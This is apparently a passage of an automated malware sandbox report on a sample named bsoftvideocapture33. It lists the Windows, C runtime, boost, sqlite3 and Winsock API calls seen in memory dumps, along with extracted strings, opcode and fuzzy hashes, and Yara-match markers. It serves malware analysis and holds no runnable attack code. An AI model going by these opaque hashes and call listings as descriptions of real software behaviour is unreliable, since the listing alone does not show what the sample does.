                                                                                                                                        • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 02C1098F
                                                                                                                                          • Part of subcall function 02C114E3: std::exception::_Copy_str.LIBCMT ref: 02C114FC
                                                                                                                                          • Part of subcall function 02C0FD60: __CxxThrowException@8.LIBCMT ref: 02C0FDBE
                                                                                                                                        • std::exception::exception.LIBCMT ref: 02C109EE
                                                                                                                                        Strings
                                                                                                                                        • boost unique_lock has no mutex, xrefs: 02C1097E
                                                                                                                                        • boost unique_lock owns already the mutex, xrefs: 02C109DD
                                                                                                                                        • $, xrefs: 02C109F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                                                                        • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                                                                        • API String ID: 2140441600-46888669
                                                                                                                                        • Opcode ID: ddf743e13114be73263cb85da90c10d85f33fd340937aff051017dccbafba0a9
                                                                                                                                        • Instruction ID: 2b2c43c7befc1822c14a143cb0bab4f47e239ef6a498c6844e8fc2da705305d4
                                                                                                                                        • Opcode Fuzzy Hash: ddf743e13114be73263cb85da90c10d85f33fd340937aff051017dccbafba0a9
                                                                                                                                        • Instruction Fuzzy Hash: DC2168B14083909FD320DF24C55574BBBE9BB89B08F004E1DF49587280CBB99448DF92
                                                                                                                                        APIs
                                                                                                                                        • __getptd_noexit.LIBCMT ref: 02C136F0
                                                                                                                                          • Part of subcall function 02C148E2: GetLastError.KERNEL32(771B0A60,771AF550,02C14AD0,02C12043,771AF550,?,02C05A0D,00000104,771B0A60,771AF550,ntdll.dll,?,?,?,02C05EE9), ref: 02C148E4
                                                                                                                                          • Part of subcall function 02C148E2: __calloc_crt.LIBCMT ref: 02C14905
                                                                                                                                          • Part of subcall function 02C148E2: __initptd.LIBCMT ref: 02C14927
                                                                                                                                          • Part of subcall function 02C148E2: GetCurrentThreadId.KERNEL32 ref: 02C1492E
                                                                                                                                          • Part of subcall function 02C148E2: SetLastError.KERNEL32(00000000,02C05A0D,00000104,771B0A60,771AF550,ntdll.dll,?,?,?,02C05EE9), ref: 02C14946
                                                                                                                                        • __calloc_crt.LIBCMT ref: 02C13713
                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 02C13731
                                                                                                                                        • __invoke_watson.LIBCMT ref: 02C1374E
                                                                                                                                        Strings
                                                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02C136FB, 02C13721
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                        • API String ID: 109275364-798102604
                                                                                                                                        • Opcode ID: d7261d88ab9b9f4c33688d93c1a66c5bdc7e9ab247eb4cfe8294f0f0abe4368c
                                                                                                                                        • Instruction ID: 2d3fa565ab961aee8f259c842a2234cebcb9f3bc47b5d4d5debfe7023b2e7246
                                                                                                                                        • Opcode Fuzzy Hash: d7261d88ab9b9f4c33688d93c1a66c5bdc7e9ab247eb4cfe8294f0f0abe4368c
                                                                                                                                        • Instruction Fuzzy Hash: 35F024B29046907AA721352A9D43A3B728DDF876F8B0000A6FA4497200EF51DD0076E8
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C02350
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C02360
                                                                                                                                        • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C02370
                                                                                                                                        • GetLastError.KERNEL32 ref: 02C0237A
                                                                                                                                          • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                                                                        • String ID: pqcs
                                                                                                                                        • API String ID: 1619523792-2559862021
                                                                                                                                        • Opcode ID: ee443cc14f6f5103ed49d17eda71eab9d7fc80b865e73eaf21087db8c4c7c550
                                                                                                                                        • Instruction ID: 28180fc8966b350d19d8b512d9284ebdac7bdbca67571318a1be4c8569306dc7
                                                                                                                                        • Opcode Fuzzy Hash: ee443cc14f6f5103ed49d17eda71eab9d7fc80b865e73eaf21087db8c4c7c550
                                                                                                                                        • Instruction Fuzzy Hash: 93F03071A40304AFDB30AFA49C4DFAB77ACEB45641B410669E909D6180EF7099589BD1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C04035
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 02C04042
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 02C04049
                                                                                                                                        • std::exception::exception.LIBCMT ref: 02C04063
                                                                                                                                          • Part of subcall function 02C096CF: __EH_prolog.LIBCMT ref: 02C096D4
                                                                                                                                          • Part of subcall function 02C096CF: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C096E3
                                                                                                                                          • Part of subcall function 02C096CF: __CxxThrowException@8.LIBCMT ref: 02C09702
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                                                                        • String ID: bad allocation
                                                                                                                                        • API String ID: 3112922283-2104205924
                                                                                                                                        • Opcode ID: 0fc61dc50780aea6f70e0c7d1cb2263c3cfea1e3f18edc5ceb080bdedc143c01
                                                                                                                                        • Instruction ID: 66cd728eec7c3a56b06d50f804139042bf5f4510867d3200a111e67c771c79e5
                                                                                                                                        • Opcode Fuzzy Hash: 0fc61dc50780aea6f70e0c7d1cb2263c3cfea1e3f18edc5ceb080bdedc143c01
                                                                                                                                        • Instruction Fuzzy Hash: 00F058B1E40259EBDB10AFE0C948BAFBB79EB04305F004948EA16A2181DB79821C9B91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                                                                        • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                                                                          • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                                                                          • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                                                                          • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                                                                          • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 683514883-0
                                                                                                                                        • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                                                        • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                                                                        • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                                                                        • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                                                                        • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                                                                          • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                                                                          • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                                                                          • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1903298374-0
                                                                                                                                        • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                                                                        • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                                                                        • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                                                                        • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                                                                        APIs
                                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 0040389D
                                                                                                                                        • GetFileType.KERNEL32(00000800), ref: 00403943
                                                                                                                                        • GetStdHandle.KERNEL32(-000000F6), ref: 0040399C
                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 004039AA
                                                                                                                                        • SetHandleCount.KERNEL32 ref: 004039E1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileHandleType$CountInfoStartup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1710529072-0
                                                                                                                                        • Opcode ID: 8d0a60c3e4ac118d2a900155c67ad164fc617dcd942d9939c19efbd45a80342d
                                                                                                                                        • Instruction ID: f62a53ccb3921abde3b71b62465be81688a6b50f354c2269ba15f2c38ec8df3a
                                                                                                                                        • Opcode Fuzzy Hash: 8d0a60c3e4ac118d2a900155c67ad164fc617dcd942d9939c19efbd45a80342d
                                                                                                                                        • Instruction Fuzzy Hash: 395148B25146408BC7208F29C9887267F98BB02326F05873AE496FB3E1D7B8DA05C709
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02C10A60: CloseHandle.KERNEL32(00000000,4213E8DE), ref: 02C10AB1
                                                                                                                                          • Part of subcall function 02C10A60: WaitForSingleObject.KERNEL32(?,000000FF,4213E8DE,?,?,?,?,4213E8DE,02C10A33,4213E8DE), ref: 02C10AC8
                                                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C10D2E
                                                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C10D4E
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C10D87
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C10DDB
                                                                                                                                        • SetEvent.KERNEL32(?), ref: 02C10DE2
                                                                                                                                          • Part of subcall function 02C0418C: CloseHandle.KERNEL32(00000000,?,02C10D15), ref: 02C041B0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4166353394-0
                                                                                                                                        • Opcode ID: c22c0356bfb9c78d87e03c81a59af229c2b2b920297572e246dc9091b5135221
                                                                                                                                        • Instruction ID: e2011ff76354c6508edf9f790fee6503e18632a430261e4966cd35716ff5ef67
                                                                                                                                        • Opcode Fuzzy Hash: c22c0356bfb9c78d87e03c81a59af229c2b2b920297572e246dc9091b5135221
                                                                                                                                        • Instruction Fuzzy Hash: 9B4105316403118FDB25AF28CC81B1B77A4EF86724F140668EC18EB295D736E991DBD1
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 02C020AC
                                                                                                                                        • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C020CD
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C020D8
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 02C0213E
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C021A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1611172436-0
                                                                                                                                        • Opcode ID: d65889ccb2b6559ef41bc7178158de66d61122d3710eeb4a27dd702920ca0742
                                                                                                                                        • Instruction ID: 4f86709b2de0772096345983ac44a74b7da2dfdbd41989979c733e18e9e2b49e
                                                                                                                                        • Opcode Fuzzy Hash: d65889ccb2b6559ef41bc7178158de66d61122d3710eeb4a27dd702920ca0742
                                                                                                                                        • Instruction Fuzzy Hash: 93314B715047019FC324DF25D888A6BB7F9FFD8654F144A1EE89683690DB30E909CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                                                                        • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                                                                        • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1894464702-0
                                                                                                                                        • Opcode ID: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                                                                        • Instruction ID: 8ebadd1dc7ee404a0f141fd21885e91e0aa1156a5a6df10951b92a0b718128ce
                                                                                                                                        • Opcode Fuzzy Hash: 7188b9a67afd66d207271078c150a83da37f36a2752b1b5804700c826a798ba9
                                                                                                                                        • Instruction Fuzzy Hash: CF313C70B086118BDB18DF79C8C1A1A7BFBBFB2704F148468E8418B219EB35DC419F91
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0D102
                                                                                                                                          • Part of subcall function 02C01A01: TlsGetValue.KERNEL32 ref: 02C01A0A
                                                                                                                                        • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C0D181
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 02C0D19D
                                                                                                                                        • InterlockedIncrement.KERNEL32(02C330F0), ref: 02C0D1C2
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 02C0D1D7
                                                                                                                                          • Part of subcall function 02C027F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C0284E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1578506061-0
                                                                                                                                        • Opcode ID: 01447b352b4bb0946f5593094ae3491ab733437f32cb7beab2334abd2789541b
                                                                                                                                        • Instruction ID: 1294d26d239d1b7d5f3324ca540072b888e43e5e856be04ea763f3f2e48a2385
                                                                                                                                        • Opcode Fuzzy Hash: 01447b352b4bb0946f5593094ae3491ab733437f32cb7beab2334abd2789541b
                                                                                                                                        • Instruction Fuzzy Hash: D03138B1D012049FCB60DFA9D8846AABBF8FF48314F14455ED84AD7640EB74AA14CFA0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 60925326: sqlite3_log.SQLITE3 ref: 60925352
                                                                                                                                        • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,609254CC), ref: 6092538E
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 609253C4
                                                                                                                                        • sqlite3_log.SQLITE3 ref: 609253E2
                                                                                                                                        • sqlite3_log.SQLITE3 ref: 60925406
                                                                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 60925443
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log$sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3336957480-0
                                                                                                                                        • Opcode ID: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                                                                        • Instruction ID: a100dd02d465b32589d57b5b9efe4db3cd483c3b5de54de748c9b161d5d001e2
                                                                                                                                        • Opcode Fuzzy Hash: 1198911827aa14b9fab328e6e7c73bc961b2278be0ca20fe6461460b1b30ceeb
                                                                                                                                        • Instruction Fuzzy Hash: D3315A70228704DBDB00EF28D49575ABBE6AFA1358F00886DE9948F36DD778C885DB02
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_result_blob.SQLITE3 ref: 609613D0
                                                                                                                                        • sqlite3_column_int.SQLITE3 ref: 6096143A
                                                                                                                                        • sqlite3_data_count.SQLITE3 ref: 60961465
                                                                                                                                        • sqlite3_column_value.SQLITE3 ref: 60961476
                                                                                                                                        • sqlite3_result_value.SQLITE3 ref: 60961482
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_column_intsqlite3_column_valuesqlite3_data_countsqlite3_result_blobsqlite3_result_value
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3091402450-0
                                                                                                                                        • Opcode ID: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                                                                        • Instruction ID: 8b12398a3b1f37ca0d2e1a8d549e1f0529ecbd38da511dd0edd3444da8e5cc4d
                                                                                                                                        • Opcode Fuzzy Hash: 15f5c91e7d752206cb5be57281081ebbda5684d1dfb7c3b21a78c03d1c189b87
                                                                                                                                        • Instruction Fuzzy Hash: 72314DB19082058FDB00DF29C48064EB7F6FF65354F19856AE8999B361EB34E886CF81
                                                                                                                                        APIs
                                                                                                                                        • WSASetLastError.WS2_32(00000000), ref: 02C02A3B
                                                                                                                                        • closesocket.WS2_32 ref: 02C02A42
                                                                                                                                        • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C02A89
                                                                                                                                        • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02C02A97
                                                                                                                                        • closesocket.WS2_32 ref: 02C02A9E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1561005644-0
                                                                                                                                        • Opcode ID: f9483e0abec58f7de19c507bb9fd0aee86f8ef8852ce7521ee33dd874398b3db
                                                                                                                                        • Instruction ID: f14f22b84b540906c0076c1deb2647a8f5bebc21cc8f2fcfa00159ef83aeaf2c
                                                                                                                                        • Opcode Fuzzy Hash: f9483e0abec58f7de19c507bb9fd0aee86f8ef8852ce7521ee33dd874398b3db
                                                                                                                                        • Instruction Fuzzy Hash: 5B210371E40305AFEB34ABB9C88876E76E99F84355F114A6DE905C32C1EF708A448B62
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 251237202-0
                                                                                                                                        • Opcode ID: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
                                                                                                                                        • Instruction ID: 8e14962182cb4ba31828fc05f1b37fa5954e33605a362b2e641de35f96add61e
                                                                                                                                        • Opcode Fuzzy Hash: ee0aefbaff40cad113deb2524f723b57adfc4224f15c8691f87345bc20e459c1
